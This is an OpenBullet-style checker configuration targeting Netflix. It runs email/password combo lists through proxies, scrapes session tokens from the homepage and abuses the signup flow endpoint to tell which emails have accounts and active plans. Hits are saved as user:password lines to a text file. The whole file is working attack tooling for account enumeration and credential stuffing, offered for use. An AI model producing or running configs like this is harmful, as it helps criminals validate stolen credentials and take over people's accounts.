[SETTINGS]
{
  "Name": "NETFLIX ",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-05-01T16:07:07.0699074-07:00",
  "AdditionalInfo": "",
  "Author": "themutalguy",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "Email",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#REQ-HOME REQUEST GET "https://www.netflix.com/" 
  
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "origin: https://www.netflix.com" 
  HEADER "referer: https://www.netflix.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Microsoft Edge\";v=\"98\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62" 
  HEADER "x-netflix.client.request.name: ui/xhrUnclassified" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "403" 
  KEYCHAIN Success OR 
    KEY "authURL\":\"" 
    KEY "<RESPONSECODE>" Contains "200" 

#AUTHURL PARSE "<SOURCE>" LR "authURL\":\"" "\"" -> VAR "URL" 

#AUTHURL FUNCTION Unescape "<URL>" -> VAR "AUTH" 

#ESN PARSE "<SOURCE>" LR "esn\":\"" "\"" -> VAR "ESN" 

#VERSION PARSE "<SOURCE>" LR "X-Netflix.uiVersion\":\"" "\"" -> VAR "XNV" 

#REQ-FLOW REQUEST POST "https://www.netflix.com/api/shakti/<XNV>/flowendpoint?flow=signupSimplicity&mode=welcome&landingURL=%2F&landingOrigin=https%3A%2F%2Fwww.netflix.com&inapp=false&esn=<ESN>&languages=en-US&netflixClientPlatform=browser&supportCategory=innovation" 
  CONTENT "{\"flow\":\"signupSimplicity\",\"mode\":\"welcome\",\"authURL\":\"<AUTH>\",\"action\":\"saveAction\",\"fields\":{\"email\":{\"value\":\"<USER>\"}}}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "origin: https://www.netflix.com" 
  HEADER "referer: https://www.netflix.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Microsoft Edge\";v=\"98\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62" 
  HEADER "x-netflix.client.request.name: ui/xhrUnclassified" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"mode\":\"registrationWithContext\"" 
  KEYCHAIN Success OR 
    KEY "\"mode\":\"switchFlow\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"mode\":\"passwordOnly\"" 

IF "<SOURCE>" Contains "\"mode\":\"switchFlow\"" 
SET CAP "𝙃𝘼𝙎 𝙋𝙇𝘼𝙉" "𝙏𝙍𝙐𝙀 ✅"
ENDIF

#CREDIT FUNCTION Constant "★ 『" -> CAP "𝐂𝐎𝐍𝐅𝐈𝐆 𝐁𝐘 ➥" 

#SAVE-HITS UTILITY File "NETFLIX VALID MAIL.txt" AppendLines "<USER>:<PASS> | 𝙃𝘼𝙎 𝙋𝙇𝘼𝙉: <𝙃𝘼𝙎 𝙋𝙇𝘼𝙉> |" 

